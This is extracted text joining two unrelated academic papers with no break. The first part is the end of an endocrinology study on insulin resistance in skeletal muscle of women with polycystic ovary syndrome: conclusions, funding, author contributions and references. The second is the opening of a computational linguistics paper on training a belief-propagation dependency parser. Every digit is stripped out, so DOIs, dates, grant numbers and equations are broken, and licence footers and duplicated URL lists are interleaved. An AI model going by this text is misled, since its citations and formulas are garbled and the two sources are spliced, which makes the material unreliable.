also support our hypothesis that tgfβ superfamily ligands, their signalling and tissue fibrosis are involved in pcos-specific insulin resistance, figure  hypothetical signalling pathway showing that dysfunctional tgfβ network signalling regulates tissue fibrosis and may play a role in this pcos-specific insulin resistance and its limited response to exercise training. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : particularly driving the synergy between obesity and pcos. intensified aerobic exercise training did not restore insulin sensitivity, despite improving insulin stimulated signalling at akt, as and mtor in overweight women with pcos. there was no clear evidence to support a role for hyperandrogenism in peripheral tissue insulin resistance, in women with pcos. overall, additional human research (in vivo and in vitro), supported by appropriate animals studies, is warranted to elucidate the role of androgens, mtor signalling, tgfβ ligand signalling networks and ecm deposition in pcos-specific insulin resistance. 
supplementary materials supplementary data has been deposited in a public data share repository and is available at: https://figshare.com/articles/supplementary_material_ molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_ women_with_pcos/ . declaration of interest n s, b s, b c and h t were awarded the nhmrc grant app ( – ), n s and r r were awarded an nhmrc grant app ( – ), d h an australia postgraduate scholarship. m g h and h t are nhmrc research fellows (app and app ). the other authors have nothing to disclose. funding the study was funded by the national health and medical research council of australia (nhmrc) project grant scheme grants app and app . author contribution statement n s and h t made substantial contributions to conception and design, acquisition of data, analysis and interpretation of data; drafting the article or revising it critically for important intellectual content; final approval of the version to be published. a j, a m a, b s, b c, c h, d h, m g h, n h, r r and s c made substantial contributions to acquisition of data, analysis and interpretation of data; drafting the article or revising it critically for important intellectual content; final approval of the version to be published. acknowledgements the authors wish to acknowledge the passing of their esteemed colleague and friend prof nigel stepto, february . the authors would like to thank profs james d cameron and juleen r zierath for their critical insights into study design and funding, prof will hopkins for mbi statistics and sas coding and dr rebecca goldstein for assistance during the trials. data sharing is available with de-identified raw data, statistical programs and analysis plans all available from authors on request. references bozdag g, mumusoglu s, zengin d, karabulut e & yildiz bo. the prevalence and phenotypic features of polycystic ovary syndrome: a systematic review and meta-analysis. human reproduction – . (https://doi.org/ . /humrep/dew ) moran lj, lombard cb, lim s, noakes m & teede hj. polycystic ovary syndrome and weight management. women’s health – . (https://doi.org/ . /whe. . ) kakoly ns, khomami mb, joham ae, cooray sd, misso ml, norman rj, harrison cl, ranasinha s, teede hj & moran lj. ethnicity, obesity and the prevalence of impaired glucose tolerance and type diabetes in pcos: a systematic review and meta- regression. human reproduction update – . (https://doi. org/ . /humupd/dmy ) lim ss, kakoly ns, tan jwj, fitzgerald g, khomami mb, joham ae, cooray sd, misso ml, norman rj, harrison cl, et al. metabolic syndrome in polycystic ovary syndrome: a systematic review, meta- analysis and meta-regression. obesity reviews – . (https://doi.org/ . /obr. ) teede hj, misso ml, deeks aa, moran lj, stuckey bga, wong jla, norman rj, costello mf & guideline development groups. assessment and management of polycystic ovary syndrome: summary of an evidence-based guideline. medical journal of australia s –s . (https://doi.org/ . /mja . ) teede hj, misso ml, costello mf, dokras a, laven j, moran l, piltonen t, norman rj & international pcos network. recommendations from the international evidence-based guideline for the assessment and management of polycystic ovary syndrome. clinical endocrinology – . (https://doi.org/ . /cen. ) cooney lg, lee i, sammel md & dokras a. high prevalence of moderate and severe depressive and anxiety symptoms in polycystic ovary syndrome: a systematic review and meta-analysis. human reproduction – . (https://doi.org/ . 
/humrep/ dex ) stepto nk, moreno-asso a, mcilvenna lc, walters ka & rodgers rj. molecular mechanisms of insulin resistance in polycystic ovary syndrome. unraveling the conundrum in skeletal muscle? journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) stepto nk, cassar s, joham ae, hutchison sk, harrison cl, goldstein rf & teede hj. women with polycystic ovary syndrome have intrinsic insulin resistance on euglycaemic-hyperinsulaemic clamp. human reproduction – . (https://doi. org/ . /humrep/des ) cassar s, misso ml, hopkins wg, shaw cs, teede hj & stepto nk. insulin resistance in polycystic ovary syndrome: a systematic review and meta-analysis of euglycaemic-hyperinsulinaemic clamp studies. human reproduction – . (https://doi.org/ . / humrep/dew ) moran lj, misso ml, wild ra & norman rj. impaired glucose tolerance, type diabetes and metabolic syndrome in polycystic ovary syndrome: a systematic review and meta-analysis. human reproduction update – . (https://doi.org/ . / humupd/dmq ) rodgers rj, avery jc, moore vm, davies mj, azziz r, stener- victorin e, moran lj, robertson sa, stepto nk, norman rj, et al. complex diseases and co-morbidities: polycystic ovary syndrome and type diabetes mellitus. endocrine connections r –r . (https://doi.org/ . /ec- - ) diamanti-kandarakis e & dunaif a. insulin resistance and the polycystic ovary syndrome revisited: an update on mechanisms and implications. endocrine reviews – . (https://doi. org/ . /er. - ) legro rs, arslanian sa, ehrmann da, hoeger km, murad mh, pasquali r, welt ck & endocrine society. diagnosis and treatment of polycystic ovary syndrome: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) stepto nk, patten r, tassone ec, misso ml, brennan l, boyle j, boyle ra, harrison cl, hirschberg al, marsh k, et al. exercise recommendations for women with polycystic ovary syndrome: is the this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://figshare.com/articles/supplementary_material_molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_women_with_pcos/ https://figshare.com/articles/supplementary_material_molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_women_with_pcos/ https://figshare.com/articles/supplementary_material_molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_women_with_pcos/ https://doi.org/ . /humrep/dew https://doi.org/ . /whe. . https://doi.org/ . /humupd/dmy https://doi.org/ . /humupd/dmy https://doi.org/ . /obr. https://doi.org/ . /mja . https://doi.org/ . /cen. https://doi.org/ . /humrep/dex https://doi.org/ . /humrep/dex https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /humrep/des https://doi.org/ . /humrep/des https://doi.org/ . /humrep/dew https://doi.org/ . /humrep/dew https://doi.org/ . /humupd/dmq https://doi.org/ . /humupd/dmq https://doi.org/ . /ec- - https://doi.org/ . /er. - https://doi.org/ . /er. - https://doi.org/ . /jc. - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : evidence enough? sports medicine – . (https://doi. org/ . /s - - - ) lundsgaard am & kiens b. 
gender differences in skeletal muscle substrate metabolism – molecular mechanisms and insulin sensitivity. frontiers in endocrinology . (https://doi. org/ . /fendo. . ) krook a, bjornholm m, galuska d, jiang xj, fahlman r, myers jr mg, wallberg-henriksson h & zierath jr. characterization of signal transduction and glucose transport in skeletal muscle from type diabetic patients. diabetes – . (https://doi. org/ . /diabetes. . . ) krook a, roth ra, jiang xj, zierath jr & wallberg-henriksson h. insulin-stimulated akt kinase activity is reduced in skeletal muscle from niddm subjects. diabetes – . (https://doi. org/ . /diab. . . ) consitt la, van meter j, newton ca, collier dn, dar ms, wojtaszewski jfp, treebak jt, tanner cj & houmard ja. impairments in site-specific as phosphorylation and effects of exercise training. diabetes – . (https://doi.org/ . /db - ) hojlund k, glintborg d, andersen nr, birk jb, treebak jt, frosig c, beck-nielsen h & wojtaszewski jf. impaired insulin-stimulated phosphorylation of akt and as in skeletal muscle of women with polycystic ovary syndrome is reversed by pioglitazone treatment. diabetes – . (https://doi.org/ . /db - ) hansen sl, svendsen pf, jeppesen jf, hoeg ld, andersen nr, kristensen jm, nilas l, lundsgaard am, wojtaszewski jfp, madsbad s, et al. molecular mechanisms in skeletal muscle underlying insulin resistance in lean women with polycystic ovary syndrome. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) raja-khan n, urbanek m, rodgers rj & legro rs. the role of tgf- beta in polycystic ovary syndrome. reproductive sciences – . (https://doi.org/ . / ) böhm a, hoffmann c, irmler m, schneeweiss p, schnauder g, sailer c, schmid v, hudemann j, machann j, schick f, et al. tgf- β contributes to impaired exercise response by suppression of mitochondrial key regulators in skeletal muscle. diabetes – . (https://doi.org/ . /db - ) seong ha, manoharan r & ha h. smad proteins differentially regulate obesity-induced glucose and lipid abnormalities and inflammation via class-specific control of ampk-related kinase mpk /melk activity. cell death and disease . (https:// doi.org/ . /s - - -x) takahashi h, alves crr, stanford ki, middelbeek rjw, nigro p, ryan re, xue r, sakaguchi m, lynes md, so k, et al. tgf-β is an exercise-induced adipokine that regulates glucose and fatty acid metabolism. nature metabolism – . (https://doi. org/ . /s - - - ) richter ea & hargreaves m. exercise, glut , and skeletal muscle glucose uptake. physiological reviews – . (https://doi. org/ . /physrev. . ) harrison cl, lombard cb, strauss bj & teede hj. optimizing healthy gestational weight gain in women at high risk of gestational diabetes: a randomized controlled trial. obesity – . (https://doi. org/ . /oby. ) hutchison sk, stepto nk, harrison cl, moran lj, strauss bj & teede hj. effects of exercise on insulin resistance and body composition in overweight and obese women with and without polycystic ovary syndrome. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - ) hutchison sk, teede hj, rachon d, harrison cl, strauss bj & stepto nk. effect of exercise training on insulin sensitivity, mitochondria and computed tomography muscle attenuation in overweight women with and without polycystic ovary syndrome. diabetologia – . (https://doi.org/ . /s - - - ) harrison cl, stepto nk, hutchison sk & teede hj. 
the impact of intensified exercise training on insulin resistance and fitness in overweight and obese women with and without polycystic ovary syndrome. clinical endocrinology – . (https://doi. org/ . /j. - . . .x) meyer c, mcgrath bp & teede hj. overweight women with polycystic ovary syndrome have evidence of subclinical cardiovascular disease. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) benziane b, burton tj, scanlan b, galuska d, canny bj, chibalin av, zierath jr & stepto nk. divergent cell signaling after short-term intensified endurance training in human skeletal muscle. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) parker l, stepto nk, shaw cs, serpiello fr, anderson m, hare dl & levinger i. acute high-intensity interval exercise-induced redox signaling is associated with enhanced insulin sensitivity in obese middle-aged men. frontiers in physiology . (https://doi. org/ . /fphys. . ) parker l, trewin a, levinger i, shaw cs & stepto nk. the effect of exercise-intensity on skeletal muscle stress kinase and insulin protein signaling. plos one e . (https://doi.org/ . / journal.pone. ) prodoehl mj, hatzirodos n, irving-rodgers hf, zhao zz, painter jn, hickey te, gibson ma, rainey we, carr br, mason hd, et al. genetic and gene expression analyses of the polycystic ovary syndrome candidate gene fibrillin- and other fibrillin family members in human ovaries. molecular human reproduction – . (https://doi.org/ . /molehr/gap ) hopkins wg, marshall sw, batterham am & hanin j. progressive statistics for studies in sports medicine and exercise science. medicine and science in sports and exercise – . (https://doi. org/ . /mss. b e cb ) corbould a, kim yb, youngren jf, pender c, kahn bb, lee a & dunaif a. insulin resistance in the skeletal muscle of women with polycystic ovary syndrome involves both intrinsic and acquired defects in insulin signaling. american journal of physiology: endocrinology and metabolism e –e . (https://doi. org/ . /ajpendo. . ) parker l, shaw cs, stepto nk & levinger i. exercise and glycemic control: focus on redox homeostasis and redox-sensitive protein signaling. frontiers in endocrinology . (https://doi. org/ . /fendo. . ) kleinert m, sylow l, fazakerley dj, krycer jr, thomas kc, oxboll aj, jordy ab, jensen te, yang g, schjerling p, et al. acute mtor inhibition induces insulin resistance and alters substrate utilization in vivo. molecular metabolism – . (https://doi. org/ . /j.molmet. . . ) bodine sc, stitt tn, gonzalez m, kline wo, stover gl, bauerlein r, zlotchenko e, scrimgeour a, lawrence jc, glass dj, et al. akt/mtor pathway is a crucial regulator of skeletal muscle hypertrophy and can prevent muscle atrophy in vivo. nature cell biology – . (https://doi.org/ . /ncb - ) dantas ws, marcondes ja, shinjo sk, perandini la, zambelli vo, neves wd, barcellos cr, rocha mp, yance v dos r, pereira rt, et al. glut translocation is not impaired after acute exercise in skeletal muscle of women with obesity and polycystic ovary syndrome. obesity – . (https://doi.org/ . /oby. ) peck gr, chavez ja, roach wg, budnik ba, lane ws, karlsson hk, zierath jr & lienhard ge. insulin-stimulated phosphorylation of the rab gtpase-activating protein tbc d regulates glut translocation. journal of biological chemistry – . (https://doi.org/ . /jbc.m . ) tonks kt, ng y, miller s, coster ac, samocha-bonet d, iseli tj, xu a, patrick e, yang jy, junutula jr, et al. 
impaired akt phosphorylation in insulin-resistant human muscle is accompanied by selective and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /fendo. . https://doi.org/ . /fendo. . https://doi.org/ . /diabetes. . . https://doi.org/ . /diabetes. . . https://doi.org/ . /diab. . . https://doi.org/ . /diab. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . / https://doi.org/ . /db - https://doi.org/ . /s - - -x https://doi.org/ . /s - - -x https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /physrev. . https://doi.org/ . /physrev. . https://doi.org/ . /oby. https://doi.org/ . /oby. https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /j. - . . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /jc. - https://doi.org/ . /ajpendo. . https://doi.org/ . /fphys. . https://doi.org/ . /fphys. . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /molehr/gap https://doi.org/ . /mss. b e cb https://doi.org/ . /mss. b e cb https://doi.org/ . /ajpendo. . https://doi.org/ . /ajpendo. . https://doi.org/ . /fendo. . https://doi.org/ . /fendo. . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /ncb - https://doi.org/ . /oby. https://doi.org/ . /jbc.m . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : heterogeneous downstream defects. diabetologia – . (https://doi.org/ . /s - - -y) newton ac. regulation of the abc kinases by phosphorylation: protein kinase c as a paradigm. biochemical journal – . (https://doi.org/ . /bj ) yu c, chen y, cline gw, zhang d, zong h, wang y, bergeron r, kim jk, cushman sw, cooney gj, et al. mechanism by which fatty acids inhibit insulin activation of insulin receptor substrate- (irs- )-associated phosphatidylinositol -kinase activity in muscle. journal of biological chemistry – . (https://doi. org/ . /jbc.m ) goto-inoue n, yamada k, inagaki a, furuichi y, ogino s, manabe y, setou m & fujii nl. lipidomics analysis revealed the phospholipid compositional changes in muscle by chronic exercise and high-fat diet. scientific reports . (https://doi.org/ . /srep ) cassar s, teede hj, moran lj, joham ae, harrison cl, strauss bj & stepto nk. polycystic ovary syndrome and anti-mullerian hormone: role of insulin resistance, androgens, obesity and gonadotrophins. clinical endocrinology – . (https://doi.org/ . / cen. ) tal r, seifer db, shohat-tal a, grazi rv & malter he. transforming growth factor-beta and its receptor soluble endoglin are altered in polycystic ovary syndrome during controlled ovarian stimulation. fertility and sterility – . (https://doi.org/ . /j. fertnstert. . . ) chen jl, colgan td, walton kl, gregorevic p & harrison ca. the tgf-β signalling network in muscle development, adaptation and disease. in growth factors and cytokines in skeletal muscle development, growth, regeneration and disease, pp. – . eds j white & g smythe. cham, switzerland: springer international publishing, . 
(https://doi.org/ . / - - - - _ ) cassar s, teede hj, harrison cl, joham ae, moran lj & stepto nk. biomarkers and insulin sensitivity in women with polycystic ovary syndrome: characteristics and predictive capacity. clinical endocrinology – . (https://doi.org/ . / cen. ) received in final form february accepted march accepted manuscript published online march this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /s - - -y https://doi.org/ . /bj https://doi.org/ . /jbc.m https://doi.org/ . /jbc.m https://doi.org/ . /srep https://doi.org/ . /cen. https://doi.org/ . /cen. https://doi.org/ . /j.fertnstert. . . https://doi.org/ . /j.fertnstert. . . https://doi.org/ . / - - - - _ https://doi.org/ . /cen. https://doi.org/ . /cen. https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction materials and methods participants study design exercise intervention clinical and biochemical measurements muscle protein extraction and western blot analyses rna extraction and tgfβ network/tissue fibrosis gene expression analysis statistical analysis results insulin signalling gene expression for tissue fibrosis impact of exercise discussion conclusions supplementary materials declaration of interest funding author contribution statement acknowledgements references approximation-aware dependency parsing by belief propagation matthew r. gormley mark dredze jason eisner human language technology center of excellence center for language and speech processing department of computer science johns hopkins university, baltimore, md {mrg,mdredze,jason}@cs.jhu.edu abstract we show how to train the fast dependency parser of smith and eisner ( ) for im- proved accuracy. this parser can consider higher-order interactions among edges while retaining o(n ) runtime. it outputs the parse with maximum expected recall—but for speed, this expectation is taken under a pos- terior distribution that is constructed only ap- proximately, using loopy belief propagation through structured factors. we show how to adjust the model parameters to compensate for the errors introduced by this approximation, by following the gradient of the actual loss on training data. we find this gradient by back- propagation. that is, we treat the entire parser (approximations and all) as a differentiable circuit, as others have done for loopy crfs (domke, ; stoyanov et al., ; domke, ; stoyanov and eisner, ). the re- sulting parser obtains higher accuracy with fewer iterations of belief propagation than one trained by conditional log-likelihood. introduction recent improvements to dependency parsing ac- curacy have been driven by higher-order features. such a feature can look beyond just the parent and child words connected by a single edge to also con- sider siblings, grandparents, etc. by including in- creasingly global information, these features pro- vide more information for the parser—but they also complicate inference. the resulting higher-order parsers depend on approximate inference and decod- ing procedures, which may prevent them from pre- dicting the best parse. for example, consider the dependency parser we will train in this paper, which is based on the work of smith and eisner ( ). 
ostensibly, this parser finds the minimum bayes risk (mbr) parse under a probability distribution defined by a higher-order dependency parsing model. in reality, it achieves o(n tmax) runtime by relying on three approxima- tions during inference: ( ) variational inference by loopy belief propagation (bp) on a factor graph, ( ) truncating inference after tmax iterations prior to convergence, and ( ) a first-order pruning model to limit the number of edges considered in the higher- order model. such parsers are traditionally trained as if the inference had been exact. in contrast, we train the parser such that the ap- proximate system performs well on the final eval- uation function. we treat the entire parsing com- putation as a differentiable circuit, and backprop- agate the evaluation function through our approx- imate inference and decoding methods to improve its parameters by gradient descent. the system also learns to cope with model misspecification, where the model couldn’t perfectly fit the distribution even absent the approximations. for standard graphical models, stoyanov and eisner ( ) call this ap- proach erma, for “empirical risk minimization un- der approximations.” for objectives besides empiri- cal risk, domke ( ) refers to it as “learning with truncated message passing.” our primary contribution is the application of this approximation-aware learning method in the pars- ing setting, for which the graphical model involves a global constraint. smith and eisner ( ) pre- viously showed how to run bp in this setting (by calling the inside-outside algorithm as a subroutine). we must backpropagate the downstream objective for perceptron training, utilizing inexact inference as a drop-in replacement for exact inference can badly mislead the learner (kulesza and pereira, ; huang et al., ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: sebastian riedel. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. function through their algorithm so that we can fol- low its gradient. we carefully define an empirical risk objective function (à la erma) to be smooth and differentiable, yet equivalent to accuracy of the minimum bayes risk (mbr) parse in the limit. find- ing this difficult to optimize, we introduce a new simpler objective function based on the l distance between the approximate marginals and the “true” marginals from the gold data. the goal of this work is to account for the approx- imations made by a system rooted in structured be- lief propagation. taking such approximations into account during training enables us to improve the speed and accuracy of inference at test time. we compare our training method with the standard ap- proach of conditional log-likelihood (cll) train- ing. we evaluate our parser on languages from the conll- (buchholz and marsi, ) and conll- (nivre et al., ) shared tasks as well as the english penn treebank (marcus et al., ). on english, the resulting parser obtains higher accuracy with fewer iterations of bp than cll. on the conll languages, we find that on av- erage it yields higher accuracy parsers than cll, particularly when limited to few bp iterations. dependency parsing by belief propagation this section describes the parser that we will train. model a factor graph (frey et al., ; kschis- chang et al., ) defines the factorization of a probability distribution over a set of variables {y ,y , . . .}. 
it is a bipartite graph between vari- ables yi and factors α. edges connect each factor α to a subset of the variables {yα ,yα , . . .}, called its neighbors. each factor defines a potential func- tion ψα, which assigns a nonnegative score to each configuration of its neighbors yα = {yα ,yα , . . .}. we define the probability of a given assignment y = {y ,y , . . .} to be proportional to the product of all factors’ potential functions: p(y) = z ∏ α ψα(yα). smith and eisner ( ) define a factor graph for dependency parsing of a given n-word sentence: n binary variables indicate which of the directed arcs are included (yi = on) or excluded (yi = off) in the dependency parse. one of the factors plays the role of a hard global constraint: ψptree(y) is juan su abdica reino $ y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , figure : factor graph for dependency parsing of a - word sentence; $ is the root of the dependency graph. the boolean variable yh,m encodes whether the edge from parent h to child m is present. the unary factor (black) connected to this variable scores the edge in iso- lation (given the sentence). the ptree factor (red) coor- dinates all variables to ensure that the edges form a tree. the drawing shows a few higher-order factors (purple for grandparents, green for arbitrary siblings); these are re- sponsible for the graph being cyclic (“loopy”). or according to whether the assignment en- codes a projective dependency tree. another n fac- tors (one per variable) evaluate the individual arcs given the sentence, so that p(y) describes a first- order dependency parser. a higher-order parsing model is achieved by also including higher-order factors, each scoring configurations of two or more arcs, such as grandparent and sibling configurations. higher-order factors tend to create cycles in the fac- tor graph. see figure for an example factor graph. we define each potential function to have a log- linear form: ψα(yα) = exp(θ ·fα(yα,x)). here x is the assignment to the observed variables such as the sentence and its pos tags; fα extracts a vector of features; and θ is our vector of model parameters. we write the resulting probability distribution over parses as pθ(y |x), to indicate that it depends on θ. loss for dependency parsing, our loss function is the number of missing edges in the predicted parse ŷ, relative to the reference (or “gold”) parse y∗: `(ŷ,y∗) = ∑ i: ŷi=off i(y∗i = on) ( ) i is the indicator function. because ŷ and y∗ each specify exactly one parent per word token, `(ŷ,y∗) equals the directed dependency error: the number of word tokens whose parent is predicted incorrectly. decoder to obtain a single parse as output, we use a minimum bayes risk (mbr) decoder, which returns the tree with minimum expected loss under the model’s distribution (bickel and doksum, ; goodman, ). our ` gives the decision rule: hθ(x) = argmin ŷ ey∼pθ(· |x)[`(ŷ,y)] ( ) = argmax ŷ ∑ i: ŷi=on pθ(yi = on |x) ( ) here ŷ ranges over well-formed parses. thus, our parser seeks a well-formed parse hθ(x) whose in- dividual edges have a high probability of being cor- rect according to pθ (since it lacks knowledge y∗ of which edges are truly correct). mbr is the prin- cipled way to take a loss function into account un- der a probabilistic model. by contrast, maximum a posteriori (map) decoding does not consider the loss function. it would return the single highest- probability parse even if that parse, and its individual edges, were unlikely to be correct. 
all systems in this paper use mbr decoding to consider the loss function at test time. this implies that the ideal training procedure would be to find the true pθ so that its marginals can be used in ( ). our baseline system attempts this. yet in practice, we will not be able to find the true pθ (model misspec- ification) nor exactly compute the marginals of pθ (computational intractability). thus, this paper pro- poses a training procedure that compensates for the system’s approximations, adjusting θ to reduce the actual loss of hθ(x) as measured at training time. to find the mbr parse, we first run inference to compute the marginal probability pθ(yi = on |x) for each edge. then we maximize ( ) by running a first-order dependency parser with edge scores equal to those probabilities. when our inference algo- rithm is approximate, we replace the exact marginal with its approximation—the belief from bp, given by bi(on) in ( ) below. inference loopy belief propagation (bp) (murphy et al., ) computes ap- proximations to the variable marginals if we used a simple - loss function within ( ), then mbr decoding would reduce to map decoding. prior work (smith and eisner, ; bansal et al., ) used the log-odds ratio log pθ(yi=on) pθ(yi=off) as the edge scores for decoding, but this yields a parse different from the mbr parse. pθ(yi |x) = ∑ y′:y′i=yi pθ(y ′ |x), as needed by ( ), as well as the factor marginals pθ(yα |x) = ∑ y′:y′α=yα pθ(y ′ |x). the algo- rithm proceeds by iteratively sending messages from variables, yi, to factors, α: m (t) i→α(yi) ∝ ∏ β∈n(i)\α m (t− ) β→i (yi) ( ) and from factors to variables: m (t) α→i(yi) ∝ ∑ yα∼yi ψα(yα) ∏ j∈n(α)\i m (t− ) j→α (yi) ( ) where n(i) and n(α) denote the neighbors of yi and α respectively, and where yα ∼ yi is standard notation to indicate that yα ranges over all assign- ments to the variables participating in the factor α provided that the ith variable has value yi. note that the messages at time t are computed from those at time (t− ). messages at the final time tmax are used to compute the beliefs at each factor and variable: bi(yi) ∝ ∏ α∈n(i) m (tmax) α→i (yi) ( ) bα(yα) ∝ ψα(yα) ∏ i∈n(α) m (tmax) i→α (yi) ( ) we assume each of the messages and beliefs given in ( )–( ) are scaled to sum-to-one. for example, bi is normalized such that ∑ yi bi(yi) = and ap- proximates the marginal distribution over yi values. messages continue to change indefinitely if the fac- tor graph is cyclic, but in the limit, the messages may converge. although the equations above update all messages in parallel, convergence is much faster if only one message is updated per timestep, in some well-chosen serial order. for the ptree factor, the summation over vari- able assignments required for m(t)α→i(yi) in eq. ( ) equates to a summation over exponentially many projective parse trees. however, we can use an inside-outside variant of eisner ( )’s algorithm following dreyer and eisner ( , footnote ), we choose an arbitrary directed spanning tree of the factor graph rooted at the ptree factor. we visit the nodes in topologically sorted order (from leaves to root) and update any message from the node being visited to a node that is later in the order. we then reverse this order and repeat, so that every message has been passed once. this constitutes one iteration of bp. to compute this in polynomial time (we describe this as hypergraph parsing in § ). 
the resulting “struc- tured bp” inference procedure—detailed by smith and eisner ( )—is exact for first-order depen- dency parsing. when higher-order factors are incor- porated, it is approximate but remains fast, whereas exact inference would be slow. approximation-aware learning we aim to find the parameters θ∗ that minimize a regularized objective function over the training sam- ple of (sentence, parse) pairs {(x(d),y(d))}dd= . θ∗ = argmin θ d (( d∑ d= j(θ;x(d),y(d)) ) + λ ||θ|| ) ( ) where λ > is the regularization coefficient and j(θ;x,y∗) is a given differentiable function, pos- sibly nonconvex. we locally minimize this objec- tive using ` -regularized adagrad with composite mirror descent (duchi et al., )—a variant of stochastic gradient descent that uses mini-batches, an adaptive learning rate per dimension, and sparse lazy updates from the regularizer. objective functions the standard choice for j is the negative conditional log-likelihood (§ ). how- ever, as in stoyanov et al. ( ), our aim is to mini- mize expected loss on the true data distribution over sentence/parse pairs (x,y ): θ∗ = argminθ e[`(hθ(x),y )] ( ) since the true data distribution is unknown, we sub- stitute the expected loss over the training sample, and regularize our objective in order to reduce sam- pling variance. specifically, we aim to minimize the regularized empirical risk, given by ( ) with j(θ;x(d),y(d)) set to `(hθ(x(d)),y(d)). note that how slow is exact inference for dependency parsing? for certain choices of higher-order factors, polynomial time is pos- sible via dynamic programming (mcdonald et al., ; car- reras, ; koo and collins, ). however, bp will typically be asymptotically faster (for a fixed number of iterations) and faster in practice. in some other settings, exact inference is np- hard. in particular, non-projective parsing becomes np-hard with even second-order factors (mcdonald and pereira, ). bp can handle this case in polynomial time by replacing the ptree factor with a tree factor that allows edges to cross. θ is initialized to when not otherwise specified. this loss function would not be differentiable—a key issue we will take up below. this is the “erma” method of stoyanov and eisner ( ). we will also consider simpler choices of j—akin to the loss func- tions used by domke ( ). gradient computation to compute the gradi- ent ∇θj(θ;x,y∗) of the loss on a single sentence (x,y∗) = (x(d),y(d)), we apply automatic differ- entiation (ad) in the reverse mode (griewank and corliss, ). this yields the same type of “back- propagation” algorithm that has long been used for training neural networks (rumelhart et al., ). it is important to note that the resulting gradient com- putation algorithm is exact up to floating-point er- ror, and has the same asymptotic complexity as the original decoding algorithm, requiring only about twice the computation. the ad method applies pro- vided that the original function is indeed differen- tiable with respect to θ. in principle, it is possi- ble to compute the gradient with minimal additional coding. there exists ad software (some listed at autodiff.org) that could be used to derive the necessary code automatically. another option would be to use the perturbation method of domke ( ). however, we implemented the gradient computation directly, and we describe it here. 
inference, decoding, and loss as a feedfoward circuit the backpropagation algorithm is often applied to neural networks, where the topology of a feedforward circuit is statically specified and can be applied to any input. our bp algorithm, decoder, and loss function similarly define a feedfoward cir- cuit that computes our function j. the circuit’s depth depends on the number of bp timesteps, tmax. its topology is defined dynamically (per sentence x(d)) by “unrolling” the computation into a graph. figure shows this topology. the high level modules consist of (a) computing potential func- tions, (b) initializing messages, (c) sending mes- sages, (d) computing beliefs, and (e) decoding and computing the loss. we zoom in on two submodules: the first computes messages from the ptree factor efficiently (c. –c. ); the second computes a soft- ened version of our loss function (e. –e. ). both of these submodules are made efficient by the inside- outside algorithm. the next two sections describe in greater detail autodiff.org how we define the function j (the forward pass) and how we compute its gradient (the backward pass). backpropagation through the circuit from figure poses several challenges. eaton and ghahramani ( ), stoyanov et al. ( ), and domke ( ) showed how to backpropagate through the basic bp algorithm, and we reiterate the key details below (§ . ). the remaining challenges form the primary technical contribution of this paper: . our true loss function `(hθ(x),y∗) by way of the decoder hθ contains an argmax ( ) over trees and is therefore not differentiable. we show how to soften this decoder (by substitut- ing a softmax), making it differentiable (§ . ). . empirically, we find the above objective diffi- cult to optimize. to address this, we substitute a simpler l loss function (commonly used in neural networks). this is easier to optimize and yields our best parsers in practice (§ . ). . we show how to run backprop through the inside-outside algorithm on a hypergraph (§ . ) for use in two modules: the softened decoder (§ . ) and computation of messages from the ptree factor (§ . ). this allows us to go be- yond stoyanov et al. ( ) and train struc- tured bp in an approximation-aware and loss- aware fashion. differentiable objective functions . annealed risk minimizing the test-time loss is the appropriate goal for training an approximate system like ours. that loss is estimated by the empirical risk on a large amount of in-domain supervised training data. alas, this risk is nonconvex and piecewise con- stant, so we turn to deterministic annealing (smith and eisner, ) and clever initialization. directed dependency error, `(hθ(x),y∗), is not differentiable due to the argmax in the decoder hθ. so we redefine j(θ;x,y∗) to be a new differentiable loss function, the annealed risk r /tθ (x,y ∗), which approaches the loss `(hθ(x),y∗) as the temperature t → . our first step is to define a distribution over parses, which takes the marginals 